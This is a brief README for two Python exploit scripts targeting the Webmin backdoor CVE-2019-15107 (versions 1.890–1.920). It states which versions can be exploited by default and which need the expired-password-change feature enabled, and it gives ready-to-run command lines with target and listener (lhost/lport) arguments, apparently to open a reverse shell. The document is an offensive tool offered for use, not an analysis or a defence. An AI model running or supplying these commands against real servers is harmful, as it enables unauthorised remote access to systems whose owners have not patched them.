Exploits a backdoor in Webmin servers versions 1.890 through 1.920.
Version 1.890 can be exploited on the default installation. Versions 1.900, 1.910 and 1.920 require the expired password change feature to be enabled.
File | Version |
---|---|
cve201915107.py | 1.900, 1.910 and 1.920 |
cve201915107_1890.py | 1.890 |
Usage:
python cve201915107.py 'target_ip' 'target_port' 'lhost' 'lport'
or
python cve201915107_1890.py 'target_ip' 'target_port' 'lhost' 'lport'
Example:
python cve201915107.py 192.168.1.202 10000 192.168.1.100 4444
or
python cve201915107_1890.py 192.168.1.202 10000 192.168.1.100 4444